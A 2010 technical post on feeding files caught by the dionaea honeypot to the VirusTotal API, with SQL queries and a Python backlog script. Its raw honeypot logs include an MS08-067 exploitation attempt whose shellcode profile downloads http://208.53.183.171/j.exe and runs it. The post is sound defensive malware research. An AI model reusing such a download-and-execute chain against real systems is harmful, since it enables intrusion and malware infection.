virustotal api

I messed with virustotal some time ago, and back then you had to scrape the html output. Things have changed: virustotal now offers a free http api to interface with their services. All you have to do is sign up and get the api key, which is hidden deep in the web2.0 interface.

The api offers three calls: get_file_report, scan_file and make_comment.

dionaea

If we receive a new file, we first check whether virustotal already knows it by calling get_file_report. The json encoded result set indicates whether the file is known; for known files, we are done at this point.
If the file is unknown, we submit it using scan_file. Once the file is uploaded, we wait 60 seconds and post a rather useless but self-advertising comment stating that this file was gathered by the dionaea honeypot. Then we wait for virustotal to analyze the file, polling for the result with get_file_report.
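The order of these steps can be sketched in a few lines of Python. This is only an illustration, not dionaea's actual code: the three callables are hypothetical wrappers around the api calls of the same name, get_file_report is assumed to return None for a file virustotal has no result for, and the 20 second polling interval is an assumption as well.

```python
import time

def process_file(md5, path, get_file_report, scan_file, make_comment,
                 sleep=time.sleep, comment_delay=60, poll_interval=20):
    """Drive one file through the steps described above.

    get_file_report, scan_file and make_comment are hypothetical callables;
    get_file_report is assumed to return a dict for a known file, else None.
    """
    report = get_file_report(md5)
    if report is not None:
        return report                  # known file, we are done
    scan_file(path)                    # unknown file: upload it
    sleep(comment_delay)               # wait 60 seconds ...
    make_comment(md5, "This file was gathered by the dionaea honeypot.")
    while True:                        # ... then poll until it is analyzed
        report = get_file_report(md5)
        if report is not None:
            return report
        sleep(poll_interval)
```

Passing sleep in as a parameter keeps the sketch testable without actually waiting.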

The api imposes a limit of at most 20 calls in 5 minutes, but the initial version of dionaea's code for submitting files to virustotal simply ignored this limit, and it ignored the result returned by virustotal as well. As the information returned by virustotal is rather interesting, I decided to let dionaea store it and associate it with the other data gathered for the attacks: the data returned by virustotal is now stored in the sqlite database. And, as I wanted virustotal to process my whole backlog of files dionaea gathered so far, dionaea had to honor the 20/5 api call limit virustotal imposes.

So dionaea's virustotal code maintains a cache of outstanding virustotal operations for all files lacking virustotal information. This cache is a sqlite3 database, and we process one item from it every 20 seconds.
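To make the arithmetic explicit: 20 calls in 5 minutes allows one call every 15 seconds at best, so one item every 20 seconds stays below the limit. A rough sketch of such a throttled queue follows. It is not dionaea's code; the backlogfiles table is reduced to the four columns used by the backlog script later in this post, and picking the oldest 'new' item and deleting it after handling are assumptions made for the example.

```python
import sqlite3

LIMIT_CALLS = 20        # virustotal allows 20 calls ...
LIMIT_WINDOW = 5 * 60   # ... per 5 minutes
INTERVAL = 20           # dionaea processes one item every 20 seconds

# 300 s / 20 calls = 15 s is the tightest allowed spacing, so 20 s is safe
assert INTERVAL >= LIMIT_WINDOW / LIMIT_CALLS

def next_item(db):
    """Oldest pending item as (md5_hash, path), or None if nothing is left."""
    return db.execute(
        "SELECT md5_hash, path FROM backlogfiles "
        "WHERE status = 'new' ORDER BY timestamp, md5_hash LIMIT 1"
    ).fetchone()

def drain(db, handle, sleep, interval=INTERVAL):
    """Hand one item at a time to handle(), pausing between items."""
    while True:
        row = next_item(db)
        if row is None:
            break
        handle(*row)
        # hypothetical bookkeeping: forget the item once it was handled
        db.execute("DELETE FROM backlogfiles WHERE md5_hash = ?", (row[0],))
        db.commit()
        sleep(interval)

# demo on an in-memory cache, with a fake sleep so nothing really waits
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE backlogfiles "
           "(status TEXT, md5_hash TEXT, path TEXT, timestamp INTEGER)")
db.executemany("INSERT INTO backlogfiles VALUES ('new', ?, ?, ?)",
               [("aa", "/tmp/aa", 1), ("bb", "/tmp/bb", 2)])
handled, naps = [], []
drain(db, lambda md5, path: handled.append(md5), naps.append)
print(handled, naps)
```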

readlogsql

logsql stores the final information in the logsql.sqlite database and you can use readlogsqltree to get a readable representation of the information received.

2010-10-07 02:50:23
  connection 483162 smbd tcp accept 93.218.68.29:445 <- 194.170.206.5:16240 (483162 None)
   dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 6cb71c2c-9812-4540-0100-000000000000
   dcerpc bind: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 24 (CreateServiceA ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 0 (CloseServiceHandle ())
   dcerpc request: uuid '367abb81-9844-35f1-ad32-98f038001003' (SVCCTL) opnum 27 (OpenSCManagerA ())
   profile: []
   offer: smb://194.170.206.5/csrss.exe
   download: 12fb7332920a7797c2d02df29b57c640 smb://194.170.206.5
     virustotal 2010-08-30 14:06:38 39/43 (91%) http://www.virustotal.com/file-scan/report.html?id=c7247d162cf720c07979946afd01b6b1907db9a4be6916a3a6be268993638fee-1283169998
       names 'Downloader' 'Downloader.Generic' 'Email-Worm.Win32.Atak' 'Email-Worm.Win32.Atak!IK' 'Generic Worm' 'Heuristic.BehavesLike.Win32.Proxy.H' 'Medium Risk Malware' 'PSW.Agent.AHCN' 'TR/Agent.mtv' 'Troj/Brambul-A' 'TrojWare.Win32.Agent.mtv0' 'Trojan' 'Trojan-Spy.Win32.Agent.bazy' 'Trojan-Spy.Win32.Agent.bbel' 'Trojan-Spy/W32.Agent.57344.KT' 'Trojan.Win32.Generic!BT' 'Trojan.Win32.Generic.51EEB62C' 'Trojan/Spy.Agent.bbel' 'Trojan/Win32.Agent.gen' 'Trojan:Win32/Brambul.A' 'TrojanSpy.Agent.QBIR' 'TrojanSpy.Agent.bbel' 'TrojanSpy.Agent.mza' 'W32/Bagz.gen@MM' 'W32/EMailWorm.DUT' 'W32/Trojan2.KEXN' 'WORM_MYDOOM.DA' 'Win-Trojan/Agent.57344.XY' 'Win32.HLLW.Bumble' 'Win32.TRAgent.Mtv' 'Win32/Pepex.E' 'Win32/Tnega.WW' 'Win32:Rootkit-gen' 'Worm.Generic.241160' 

You get the detection rate, the link to the virustotal report and the names the different av companies assigned to the threat. As CME (Common Malware Enumeration) was abandoned, the only way to get a reasonable number of names is gathering files with low detection rates:

2010-10-06 19:16:07
  connection 482728 smbd tcp accept 93.218.68.209:445 <- 93.81.169.153:3132 (482728 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
   profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.171/j.exe', '83.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['83.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
   offer: http://208.53.183.171/j.exe
   download: c9e5edea5f4f1b2c7ea6a3d15a9450f7 http://208.53.183.171/j.exe
     virustotal 2010-10-05 20:49:20 0/43 (0%) http://www.virustotal.com/file-scan/report.html?id=3819100edd956200aa65ce6dceb3fd07414f180e624fdb1979bb13c8b3019d0c-1286304560
       names 

In this case there was no detection, but if you follow the link, virustotal points to a more recent analysis of the file, where 14 of 42 scanners detected the threat.
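The virustotal line in the output above has a fixed shape (timestamp, hits/total, percentage, link), so it is easy to pick apart if you want to post-process the text output. A small sketch, assuming the line always looks like the two samples shown here; the regular expression and the function name are made up for this example and are not part of readlogsqltree.

```python
import re

VT_LINE = re.compile(
    r"virustotal (?P<date>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<hits>\d+)/(?P<total>\d+) \((?P<percent>\d+)%\) (?P<link>\S+)")

def parse_virustotal_line(line):
    """Return date, hits, total, rate and link of a virustotal line, or None."""
    m = VT_LINE.search(line)
    if m is None:
        return None
    hits, total = int(m.group("hits")), int(m.group("total"))
    return {
        "date": m.group("date"),
        "hits": hits,
        "total": total,
        "rate": hits / total if total else 0.0,   # detection rate, 0.0 .. 1.0
        "link": m.group("link"),
    }

sample = ("     virustotal 2010-10-05 20:49:20 0/43 (0%) "
          "http://www.virustotal.com/file-scan/report.html?id="
          "3819100edd956200aa65ce6dceb3fd07414f180e624fdb1979bb13c8b3019d0c-1286304560")
print(parse_virustotal_line(sample))
```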

sqlite3

Given the data is available in a sqlite database, it is rather easy to query …

example #1

SELECT
	COUNT(virustotalscan_result), virustotalscan_result
FROM
	virustotals
	NATURAL JOIN virustotalscans
WHERE
	virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY 
	virustotalscan_result
ORDER BY
	COUNT(virustotalscan_result) DESC;

Get all names for Conficker - if one scanner claims it is Conficker, we assume all other names are aliases for Conficker.

count  name
8900   Win32.Worm.Downadup.Gen
6894   W32/Conficker!Generic
5797   WORM_DOWNAD.AD
3870   Net-Worm.Win32.Kido.ih
3721   Mal/Conficker-A
3666   W32/Conficker.worm.gen.a
3605   W32/Conficker.C.worm
3423   W32.Downadup.B
3388   Win32:Confi
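To see why this query yields aliases, it helps to run it on a tiny made-up data set. The sketch below builds an in-memory database with a stripped-down guess at the two tables (only the columns used in the queries of this post, the real schema has more) and joins virustotals with virustotalscans the way example #3 does. Scanner names and rows are invented.

```python
import sqlite3

db = sqlite3.connect(":memory:")
# assumed minimal schema, the shared column 'virustotal' drives the NATURAL JOIN
db.executescript("""
CREATE TABLE virustotals (
    virustotal INTEGER PRIMARY KEY, virustotal_md5_hash TEXT);
CREATE TABLE virustotalscans (
    virustotalscan INTEGER PRIMARY KEY, virustotal INTEGER,
    virustotalscan_scanner TEXT, virustotalscan_result TEXT);
""")
db.executemany("INSERT INTO virustotals VALUES (?, ?)",
               [(1, "aa"), (2, "bb"), (3, "cc"), (4, "dd")])
db.executemany(
    "INSERT INTO virustotalscans "
    "(virustotal, virustotalscan_scanner, virustotalscan_result) VALUES (?, ?, ?)",
    [(1, "ScannerA", "W32/Conficker!Generic"),
     (1, "ScannerB", "Net-Worm.Win32.Kido.ih"),
     (1, "ScannerC", "W32.Downadup.B"),
     (2, "ScannerA", "W32/Conficker!Generic"),
     (2, "ScannerB", "Net-Worm.Win32.Kido.ih"),
     (3, "ScannerA", "W32/Conficker!Generic"),
     (4, "ScannerA", "Trojan.Generic")])      # unrelated report, must not show up

rows = db.execute("""
SELECT COUNT(virustotalscan_result), virustotalscan_result
FROM virustotals NATURAL JOIN virustotalscans
WHERE virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans
                     WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY virustotalscan_result
ORDER BY COUNT(virustotalscan_result) DESC""").fetchall()
for count, name in rows:
    print(count, name)
```

Reports 1 to 3 each contain a name matching Conficker, so every name in those reports is counted as an alias, while the unrelated report 4 is left out.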

example #2

SELECT
	COUNT(DISTINCT virustotalscan_result), virustotalscan_scanner
FROM
	virustotals
	NATURAL JOIN virustotalscans
WHERE
	virustotal IN (SELECT DISTINCT virustotal FROM virustotalscans WHERE virustotalscan_result LIKE '%Conficker%')
GROUP BY 
	virustotalscan_scanner
ORDER BY
	COUNT(DISTINCT virustotalscan_result) DESC;

Signature quality: how many distinct signatures does each scanner have for Conficker?

count  scanner
1445   nProtect
592    McAfee-GW-Edition
558    Jiangmin
463    McAfee
456    McAfee+Artemis
330    ViRobot
270    Rising
260    ClamAV

example #3

SELECT 
	download_md5_hash, 
	COUNT(DISTINCT dcerpcserviceop_vuln) AS vulncnt,
	MAX(dcerpcserviceop_vuln) AS maxvuln,
	COUNT(download_md5_hash) AS numdls
FROM
	virustotalscans
	NATURAL JOIN virustotals
	JOIN downloads ON(download_md5_hash = virustotal_md5_hash)
	NATURAL JOIN connections
	NATURAL JOIN dcerpcrequests
	JOIN dcerpcservices ON(dcerpcrequest_uuid = dcerpcservice_uuid)
	JOIN dcerpcserviceops ON (dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice AND dcerpcserviceop_opnum = dcerpcrequest_opnum)
WHERE
	virustotalscan_scanner = 'Kaspersky'
	AND virustotalscan_result IS NULL
	AND dcerpcserviceop_vuln IS NOT NULL
	AND dcerpcserviceop_vuln != ''
GROUP BY
	download_md5_hash
ORDER BY
	COUNT(download_md5_hash) DESC;

Query all samples gathered via smb bugs which are not detected by Kaspersky, together with the vulnerability used.

md5sum                            number of vulns  example vuln  downloads
3498bcd9d0f5f94575f7b4e78d1b337d  1                MS08-67       6
3ae47280a0008814efef0e9f236f1800  1                MS08-67       4
7c5b64d771e0f205e3884c3fcf361a8b  1                MS08-67       4
3de40bad3d1409376ad77077159707bb  1                MS08-67       3
2b40f52664bda0565f6c2c6016c50cad  1                MS08-67       2
53979f1820886f089a75689ed15ecf6e  1                MS08-67       2

processing backlog

As this is quite new code, and dionaea only queries new files, by default you won't get any virustotal results for the files you gathered so far. By default means this can be changed.
We can simply store all files received so far in the already mentioned virustotal cache file, and dionaea will process the whole backlog. Due to the api limit of 20 requests in 5 minutes, with dionaea doing one request every 20 seconds, this will take some time.

#!/opt/dionaea/bin/python3

import sqlite3

lsqld = sqlite3.connect('/opt/dionaea/var/dionaea/logsql.sqlite')
lsqlc = lsqld.cursor()

# all downloads without a virustotal result, most frequently seen files first
r = lsqlc.execute("""SELECT 
	download_md5_hash 
FROM 
	downloads 
	LEFT OUTER JOIN virustotals ON (virustotal_md5_hash = download_md5_hash)
WHERE 
	virustotal_md5_hash IS NULL
GROUP BY 
	download_md5_hash 
ORDER BY 
	COUNT(*) DESC;""")

vtd = sqlite3.connect('/opt/dionaea/var/dionaea/vtcache.sqlite')
vtc = vtd.cursor()

# queue every such file in the virustotal cache with status 'new'
for i in r:
	vtc.execute("INSERT INTO backlogfiles (status,md5_hash,path,timestamp) VALUES ('new',?,?,strftime('%s','now'))", (
		i[0], '/opt/dionaea/var/dionaea/binaries/' + i[0]) )

vtd.commit()
vtd.close()
lsqld.close()

You can check the status from time to time:
sqlite3 /opt/dionaea/var/dionaea/vtcache.sqlite

SELECT count(*) FROM backlogfiles;

get number of pending files

SELECT * FROM backlogfiles WHERE STATUS != 'new';

get files which are being processed
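If you would rather have a one-shot summary, the same information can be pulled with a few lines of Python. This is a sketch under assumptions: it only relies on the status column of backlogfiles, and the time estimate is a lower bound, as it counts a single request per file at one request every 20 seconds while unknown files need several requests. The demo runs on an in-memory table with made-up rows; on a sensor you would connect to vtcache.sqlite instead.

```python
import sqlite3

def backlog_summary(db, interval=20):
    """Return ({status: count}, minimum seconds needed to work off the backlog)."""
    counts = dict(db.execute(
        "SELECT status, COUNT(*) FROM backlogfiles GROUP BY status"))
    pending = sum(counts.values())
    return counts, pending * interval

# demo data; use sqlite3.connect('/opt/dionaea/var/dionaea/vtcache.sqlite') for real
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE backlogfiles "
           "(status TEXT, md5_hash TEXT, path TEXT, timestamp INTEGER)")
db.executemany("INSERT INTO backlogfiles (status, md5_hash) VALUES (?, ?)",
               [("new", "aa"), ("new", "bb"), ("query", "cc")])
counts, seconds = backlog_summary(db)
print(counts, seconds)
```

For a sense of scale, 1000 pending files come out at 20000 seconds at least, which is roughly five and a half hours.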

As dionaea currently does not deal gracefully with virustotal server or connection errors, files sometimes get stuck. You can revive them using:

UPDATE backlogfiles SET STATUS = 'comment' WHERE STATUS = 'comment-';
UPDATE backlogfiles SET STATUS = 'new' WHERE STATUS = 'new-';
UPDATE backlogfiles SET STATUS = 'query' WHERE STATUS = 'query-';
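All three statements do the same thing, they strip the trailing '-' from the status. A sketch of doing this in one go from Python, assuming every status ending in '-' marks a stuck file (only the three shown above are known to me) and using sqlite's rtrim() function. The demo uses an in-memory table with made-up rows.

```python
import sqlite3

def revive_stuck(db):
    """Strip the trailing '-' from every stuck status, return the rows changed."""
    cur = db.execute(
        "UPDATE backlogfiles SET status = rtrim(status, '-') "
        "WHERE status LIKE '%-'")
    db.commit()
    return cur.rowcount

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE backlogfiles "
           "(status TEXT, md5_hash TEXT, path TEXT, timestamp INTEGER)")
db.executemany("INSERT INTO backlogfiles (status, md5_hash) VALUES (?, ?)",
               [("new-", "aa"), ("query-", "bb"), ("comment", "cc")])
changed = revive_stuck(db)
print(changed, db.execute(
    "SELECT md5_hash, status FROM backlogfiles ORDER BY md5_hash").fetchall())
```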

And for some files, virustotal does not work at all: in my case I was unable to submit some files, d320d802a407da14a77e809329de31cc for example.

2010/10/07/virustotal_api.txt · Last modified: 2010/10/07 15:08 by common